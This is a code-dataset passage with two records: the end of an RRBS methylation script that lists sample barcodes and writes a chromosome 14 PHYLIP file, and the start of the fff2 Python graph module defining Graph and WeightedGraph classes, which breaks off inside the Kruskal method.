"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CTATTG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CTCAGC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GACACG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GCATTC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GGCATC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GTGAGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GTTGAG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TAGCGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TATCTC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TCTCTG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACAACC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACCGCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACTCAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.AGGATG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ATAGCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ATCGAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CAAGAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CATGAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CCTTCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CGGTAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CTATTG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CTCAGC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GCATTC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GCTGCC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GGCATC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GTGAGG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GTTGAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.TAGCGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACAACC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACCGCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACGTGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACTCAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.AGGATG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ATAGCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ATCGAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CAAGAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CATGAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CCTTCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CGGTAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CTATTG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CTCAGC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GACACG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GCATTC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GCTGCC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GGCATC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GTGAGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GTTGAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TAGCGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TATCTC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TCTCTG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ACCGCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ACTCAC",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ATAGCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CAAGAG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CCTTCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CTATTG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.GACACG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.GTGAGG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.TAGCGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACAACC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACCGCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACGTGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACTCAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.AGGATG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ATAGCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ATCGAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CATGAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CCTTCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CGGTAG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CTATTG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CTCAGC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GACACG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GCATTC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GCTGCC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GGCATC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GTGAGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GTTGAG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TAGCGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TATCTC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TCTCTG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACAACC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACCGCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACGTGG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACTCAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.AGGATG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ATAGCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ATCGAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CAAGAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CATGAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CCTTCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CGGTAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CTATTG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CTCAGC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GACACG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GCATTC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GCTGCC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GGCATC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GTTGAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TAGCGG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TATCTC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TCTCTG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACAACC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACCGCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACGTGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACTCAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.AGGATG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ATAGCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ATCGAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CATGAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CCTTCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CGGTAG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CTATTG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CTCAGC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GACACG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GCATTC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GCTGCC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GGCATC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GTGAGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TAGCGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TATCTC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TCTCTG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACAACC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACCGCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACGTGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACTCAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.AGGATG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ATAGCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ATCGAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CAAGAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CATGAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CCTTCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CGGTAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CTATTG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CTCAGC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GACACG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GCATTC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GCTGCC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GGCATC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GTGAGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GTTGAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TAGCGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TATCTC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TCTCTG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACAACC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACCGCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACGTGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACTCAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.AGGATG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ATAGCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ATCGAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CAAGAG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CATGAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CCTTCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CGGTAG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CTATTG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CTCAGC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GCATTC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GCTGCC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GGCATC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GTGAGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GTTGAG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TAGCGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TATCTC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TCTCTG"]
print(total_matrix.shape)
total_matrix = total_matrix.applymap(lambda x: int(x) if pd.notnull(x) else str("?"))
total_matrix = total_matrix.astype(str).apply(''.join)
tott = pd.Series(total_matrix.index.astype(str).str.cat(total_matrix.astype(str),' '))
tott.to_csv("normal_chrom14.phy", header=None, index=None)
print(tott.shape)
|
evanbiederstedt/RRBSfun
|
trees/chrom_scripts/normal_chr14.py
|
Python
|
mit
| 25,844
|
[
"MCell"
] |
8c87a0fdbacb7487201d271d86bab066d4dd598756fc785bb7b0bf8c74bf2ac6
|
from _graph import *
from _graph import __doc__
import numpy as np
"""
This module implements the main graph classes of fff2
Graph: basic topological graph, i.e. vertices and edges. Not well developed
WeightedGraph (Graph): Idem plus values asociated with vertices
BipartiteGraph (WeightedGraph): Idem but the graph is Bipartite
Author: Bertrand Thirion, 2006--2009
Fixme : add graph creation routines that are more practical
than current procedures
"""
class Graph:
"""
This is the basic topological (non-weighted) directed Graph class
fields :
- V(int) = the number of vertices
- E(int) = the number of edges
- edges = array of int with shape (E,2) : the edges of the graph
"""
def __init__(self, V, E=0):
self.V = int(V)
if self.V < 1:
raise ValueError, 'Empty graphs cannot be created'
self.E = int(E)
if self.E<0:
self.E = 0
self.vertices = [a for a in range(self.V)]
self.edges = np.zeros((self.E,2),np.int)
def set_edges(self,edges):
"""
sets self.edges=edges if
1. edges has a correct size
2. edges take values in [1..V]
"""
if np.shape(edges)!=np.shape(self.edges):
raise ValueError, 'Incompatible size of the edge matrix'
if np.size(edges)>0:
if edges.max()+1>self.V:
raise ValueError, 'Incorrect edge specification'
self.edges = edges
def get_vertices(self):
return self.vertices
def get_edges(self):
try:
temp = self.edges
except:
temp = []
return temp
def get_V(self):
return self.V
def get_E(self):
return self.E
def adjacency(self):
A = np.zeros((self.V,self.V))
for e in range(self.E):
i = self.edges[e][0]
j = self.edges[e][1]
A[i,j] = 1
return(A)
def complete(self):
self.E = self.V*self.V
x = np.array[np.where(np.ones((self.V,self.V)))]
self.edges = np.transpose(x)
def cc(self):
"""
Returns an array of labels corresponding to the different
connex components of the graph.
Returns
-------
label: array of shape(self.V), labelling of the vertices
"""
if self.E>0:
label = graph_cc(self.edges[:,0],self.edges[:,1],
np.zeros(self.E),self.V)
else:
label = np.arange(self.V)
return label
def degrees(self):
"""
returns the degree of the graph vertices
Returns
-------
rdegree: array of shape self.V, the right degree
ldegree: array of shape self.V, the left degree
"""
if self.E>0:
right,left = graph_degrees(self.edges[:,0],self.edges[:,1],self.V)
else:
right = np.zeros(self.V,np.int)
left = np.zeros(self.V,np.int)
return right,left
def main_cc(self):
"""
Returns the indexes of the vertices within the main cc
Returns
-------
idx: array of shape (sizeof main cc)
"""
if self.E>0:
idx = graph_main_cc(self.edges[:,0], self.edges[:,1],
np.zeros(self.E),self.V)
else:
idx = 0
return idx
def show(self,figid=-1):
"""
show the graph as a planar graph
Parameters
----------
figid = -1 the figure id in pylab
by default a new figure is created
Returns
-------
figid
"""
import matplotlib.pylab as mp
if figid>-1:
figid = mp.figure(int(figid))
else:
mp.figure()
t = (2*np.pi*np.arange(self.V))/self.V
mp.plot(np.cos(t),np.sin(t),'.')
for e in range(self.E):
A = (self.edges[e,0]*2*np.pi)/self.V
B = (self.edges[e,1]*2*np.pi)/self.V
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],'k')
mp.axis('off')
return figid
class WeightedGraph(Graph):
"""
This is the basic weighted, directed graph class implemented in fff
fields :
V(int) = the number of vertices
E(int) = the number of edges
edges = array of int with shape (E,2):
the edges of the graph
weihghts = array of int with shape (E):
the weights/length of the graph edges
"""
def __init__(self, V, edges=None, weights=None):
"""
Parameters
----------
V (int >0): the number of edges of the graph
edges=None: array of shape(E,2)
the edge array of the graph
weights=None: array of shape (E)
the asociated weights array
"""
V = int(V)
if V<1:
raise ValueError, 'cannot create graph with no vertex'
self.V = int(V)
self.E = 0
if (edges==None)&(weights==None):
edges = []
weights = []
else:
if edges.shape[0]==np.size(weights):
E = edges.shape[0]
Graph.__init__(self, V, E)
Graph.set_edges(self,edges)
self.weights = weights
else:
raise ValueError, 'Incompatible size of the edges\
and weights matrices'
def adjacency(self):
"""
Create the adjacency matrix of self
Returns
-------
A : an ((self.V*self.V),np.double) array
adjacency matrix of the graph
Caveat
------
may break if self.V is large
Future version should allow sparse matrix coding
"""
A = np.zeros((self.V,self.V),np.double)
for e in range(self.E):
i = self.edges[e][0]
j = self.edges[e][1]
A[i,j] = self.weights[e]
return(A)
def from_adjacency(self,A):
"""
sets the edges of self according to the adjacency matrix M
Parameters
----------
M: array of shape(sef.V,self.V)
"""
if A.shape[0] != self.V:
raise ValueError,"bad size for A"
if A.shape[1] != self.V:
raise ValueError,"bad size for A"
i,j = np.where(A)
self.edges = np.transpose(np.vstack((i,j)))
self.weights = (A[i,j])
self.E = np.size(i)
def set_weights(self,weights):
"""
Parameters
----------
weights : an array of shape(self.V), edges weights
"""
if np.size(weights)!=self.E:
raise ValueError, 'The weight size is not the edges size'
else:
self.weights = np.reshape(weights,(self.E))
def get_weights(self):
return self.weights
def from_3d_grid(self,xyz,k=18):
"""
set the graph to be the topological neighbours graph
of the thre-dimensional coordinate set xyz,
in the k-connectivity scheme
Parameters
----------
xyz: array of shape (self.V,3) and type np.int,
k = 18: the number of neighbours considered. (6,18 or 26)
Returns
-------
E(int): the number of edges of self
"""
if xyz.shape[0]!=self.V:
raise ValueError, 'xyz should have shape n*3, with n =self.V'
if xyz.shape[1]!=3:
raise ValueError, 'xyz should have shape n*3'
graph = graph_3d_grid(xyz, k)
if graph is not None:
i,j,d = graph
else:
raise TypeError, 'Creating graph from grid failed. '\
'Maybe the grid is too big'
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def complete(self):
"""
self.complete()
makes self a complete graph (i.e. each pair of vertices is an edge)
"""
i,j,d = graph_complete(self.V)
self.E = self.V*self.V
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
def eps(self,X,eps=1.):
"""
set the graph to be the eps-nearest-neighbours graph of the data
Parameters
----------
X array of shape (self.V) or (self.V,p)
where p = dimension of the features
data used for eps-neighbours computation
eps=1. (float), the neighborhood width
Returns
-------
self.E the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidian space
trivial edges (aa) are included
for the sake of speed it is advisable to give
a PCA-preprocessed matrix X
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0]!=self.V'
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_eps(X,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
def knn(self,X,k=1):
"""
E = knn(X,k)
set the graph to be the k-nearest-neighbours graph of the data
Parameters
----------
X array of shape (self.V) or (self.V,p)
where p = dimension of the features
data used for eps-neighbours computation
k=1 : is the number of neighbours considered
Returns
-------
- self.E (int): the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidian space
the knn system is symmeterized: if (ab) is one of the edges
then (ba) is also included
trivial edges (aa) are not included
for the sake of speed it is advisable to give
a PCA-preprocessed matrix X.
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
try:
k=int(k)
except :
"k cannot be cast to an int"
if np.isnan(k):
raise ValueError, 'k is nan'
if np.isinf(k):
raise ValueError, 'k is inf'
i,j,d = graph_knn(X,k)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def mst(self,X):
"""
makes self the MST of the array X
Parameters
----------
X: an array of shape (self.V,dim)
p is the feature dimension of X
Returns
-------
tl (float) the total length of the mst
Note
----
It is assumed that the features are embedded in a
(locally) Euclidian space
The edge system is symmeterized: if (ab) is one of the edges
then (ba) is another edge
As a consequence, the graph comprises (2*self.V-2) edges
the algorithm uses Boruvska's method
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
i,j,d = graph_mst(X)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.weights.sum()/2
def cut_redundancies(self):
"""
self.cut_redudancies()
Remove possibly redundant edges: if an edge (ab) is present twice
in the edge matrix, only the first instance in kept.
The weights are processed accordingly
Returns
-------
- E(int): the number of edges, self.E
"""
if self.E>0:
i,j,d = graph_cut_redundancies( self.edges[:,0], self.edges[:,1],
self.weights, self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def dijkstra(self,seed=0):
"""
returns all the [graph] geodesic distances starting from seed
it is mandatory that the graph weights are non-negative
Parameters
----------
seed (int, >-1,<self.V) or array of shape(p)
edge(s) from which the distances are computed
Returns
-------
dg: array of shape (self.V) ,
the graph distance dg from ant vertex to the nearest seed
Note
----
it is mandatory that the graph weights are non-negative
"""
try:
if self.weights.min()<0:
raise ValueError, 'some weights are non-positive'
except:
raise ValueError,'undefined weights'
if self.E>0:
if np.size(seed)>1:
dg = graph_dijkstra_multiseed( self.edges[:,0],
self.edges[:,1],self.weights,seed,self.V)
else:
dg = graph_dijkstra(self.edges[:,0],
self.edges[:,1],self.weights,seed,self.V)
else:
dg = np.infty*np.ones(self.V,np.size(seed))
for i in range(np.size(seed)):
dg[seed[i],i] = 0
return dg
def floyd(self, seed=None):
"""
Compute all the geodesic distances starting from seeds
it is mandatory that the graph weights are non-negative
Parameters
----------
seed= None: array of shape (nbseed), type np.int
vertex indexes from which the distances are computed
if seed==None, then every edge is a seed point
Returns
-------
dg array of shape (nbseed,self.V)
the graph distance dg from each seed to any vertex
Note
----
It is mandatory that the graph weights are non-negative
The algorithm proceeds byr epeating dijkstra's algo for each
seed. floyd's algo is not used (O(self.V)^3 complexity...)
By convention, infinte distances are coded with sum(self.wedges)+1
"""
if seed == None:
seed = np.arange(self.V)
if self.E==0:
dg = np.infty*np.ones((self.V,np.size(seed)))
for i in range(np.size(seed)): dg[seed[i],i] = 0
return dg
try:
if self.weights.min()<0:
raise ValueError, 'some weights are non-positive'
except:
raise ValueError,'undefined weights'
dg = graph_floyd(self.edges[:,0], self.edges[:,1], self.weights,
seed, self.V)
return dg
def normalize(self,c=0):
"""
Normalize the graph according to the index c
Normalization means that the sum of the edges values
that go into or out each vertex must sum to 1
Parameters
----------
c=0 in {0,1,2}, optional: index that designates the way
according to which D is normalized
c == 0 => for each vertex a, sum{edge[e,0]=a} D[e]=1
c == 1 => for each vertex b, sum{edge[e,1]=b} D[e]=1
c == 2 => symmetric ('l2') normalization
Note
----
Note that when sum(edge[e,.]=a) D[e]=0, nothing is performed
"""
c = int(c)
if c>2:
raise ValueError, 'c>2'
if c<0:
raise ValueError, 'c<0'
if self.E==0:
if c<2:
return np.zeros(self.V)
else:
return np.zeros(self.V),np.zeros(self.V)
if c<2:
i,j,d,s = graph_normalize(self.edges[:,0], self.edges[:,1],
self.weights,c,self.V)
else:
i,j,d,s,t = graph_normalize(self.edges[:,0], self.edges[:,1],
self.weights,c,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
if c<2:
return s
else:
return s,t
def reorder(self,c=0):
"""
Reorder the graph according to the index c
Parameters
----------
c=0 in {0,1,2}, index that designates the array
according to which the vectors are jointly reordered
c == 0 => reordering makes edges[:,0] increasing,
and edges[:,1] increasing for edges[:,0] fixed
c == 1 => reordering makes edges[:,1] increasing,
and edges[:,0] increasing for edges[:,1] fixed
c == 2 => reordering makes weights increasing
"""
c = int(c)
if c>2:
raise ValueError, 'c>2'
if c<0:
raise ValueError, 'c<0'
if self.E>0:
i,j,d = graph_reorder(self.edges[:,0],self.edges[:,1],
self.weights,c,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
def set_euclidian(self, X):
"""
Compute the weights of the graph as the distances between the
corresponding rows of X, which represents an embdedding of self
Parameters
----------
X array of shape (self.V, edim),
the coordinate matrix of the embedding
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
if self.E>0:
d = graph_set_euclidian(self.edges[:,0],self.edges[:,1],X)
self.weights = d
def set_gaussian(self, X, sigma=0):
"""
Compute the weights of the graph as a gaussian function
of the dinstance between the
corresponding rows of X, which represents an embdedding of self
Parameters
----------
X array of shape (self.V,dim)
the coordinate matrix of the embedding
sigma=0, float : the parameter of the gaussian function
Note
----
when sigma = 0, the following value is used :
sigma = sqrt(mean(||X[self.edges[:,0],:]-X[self.edges[:,1],:]||^2))
"""
sigma = float(sigma)
if sigma<0:
raise ValueError, 'sigma<0'
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
if self.E>0:
d = graph_set_gaussian(self.edges[:,0],self.edges[:,1],X,sigma)
self.weights = d
def symmeterize(self):
"""
symmeterize the graphself , ie produces the graph
whose adjacency matrix would be the symmetric part of
its current adjacency matrix
"""
if self.E>0:
i,j,d = graph_symmeterize(self.edges[:,0],self.edges[:,1],self.weights,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
return self.E
def anti_symmeterize(self):
"""
self.anti_symmeterize()
anti-symmeterize the self , ie produces the graph
whose adjacency matrix would be the antisymmetric part of
its current adjacency matrix
"""
if self.E>0:
i,j,d = graph_antisymmeterize(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
return self.E
def to_neighb(self):
"""
converts the graph to a neighboring system
The neighboring system is nothing but a (sparser)
representation of the edge matrix
Returns
-------
ci, ne, we: arrays of shape (self.V+1), (self.E), (self.E)
such that self.edges, self.weights
is coded such that:
for j in [ci[a] ci[a+1][, there exists en edge e so that
(edge[e,0]=a,edge[e,1]=ne[j],self.weights[e] = we[j])
"""
if self.E>0:
ci,ne,we = graph_to_neighb(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
else:
ci = []
ne = []
we = []
return ci,ne,we
def Voronoi_Labelling(self,seed):
"""
label = self.Voronoi_Labelling(seed)
performs a voronoi labelling of the graph
Parameters
----------
seed array of shape (nseeds), type (np.int),
vertices from which the cells are built
Returns
-------
- labels : array of shape (self.V) the labelling of the vertices
fixme: how is dealt the case of diconnected graph ?
"""
if np.size(seed)==0:
raise ValueError, 'empty seed'
if seed.max()>self.V-1:
raise ValueError, 'seed.max()>self.V-1'
labels = -np.ones(self.V,np.int)
labels[seed] = np.arange(np.size(seed))
if self.E>0:
labels = graph_voronoi(self.edges[:,0], self.edges[:,1],
self.weights, seed,self.V)
return labels
def cliques(self):
"""
Extraction of the graphe cliques
these are defined using replicator dynamics equations
Returns
-------
- cliques: array of shape (self.V), type (np.int)
labelling of the vertices according to the clique they belong to
"""
cliques = np.arange(self.V)
if self.E>0:
cliques = graph_rd(self.edges[:,0], self.edges[:,1],
self.weights, self.V)
return cliques
def remove_trivial_edges(self):
"""
Removes trivial edges, i.e. edges that are (vv)-like
self.weights and self.E are corrected accordingly
Returns
-------
- self.E (int): The number of edges
"""
i = np.nonzero(self.edges[:,0]!=self.edges[:,1])[0]
self.edges = self.edges[i,:]
self.weights = self.weights[i]
self.E = np.size(i)
return self.E
def subgraph(self,valid):
"""
Creates a subgraph with the vertices for which valid>0
and with the correponding set of edges
Parameters
----------
valid array of shape (self.V): nonzero for vertices to be retained
Returns
-------
G WeightedGraph instance, the desired subgraph of self
Note
----
The vertices are renumbered as [1..p] where p = sum(valid>0)
when sum(valid==0) then None is returned
"""
if np.size(valid)!= self.V:
raise ValueError, "incompatible size for self anf valid"
if np.sum(valid>0)==0:
return None
if self.E>0:
win_edges = (valid[self.edges]).min(1)>0
edges = self.edges[win_edges,:]
weights = self.weights[win_edges]
renumb = np.hstack((0,np.cumsum(valid>0)))
edges = renumb[edges]
G = WeightedGraph(np.sum(valid>0),edges,weights)
else:
G = WeightedGraph(np.sum(valid)>0)
return G
def Kruskal(self):
"""
Creates the Minimum Spanning Tree self using Kruskal's algo.
efficient is self is sparse
Returns
-------
K: WeightedGraph instance
the resulting MST
Note
----
if self contains several connected components,
self.Kruskal() will also retain a graph with k connected components
"""
k = self.cc().max()+1
E = 2*self.V-2
V = self.V
Kedges = np.zeros((E,2)).astype(np.int)
Kweights = np.zeros(E)
iw = np.argsort(self.weights)
label = np.arange(V) #(2*V-1)
j = 0
for i in range(V-k):
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
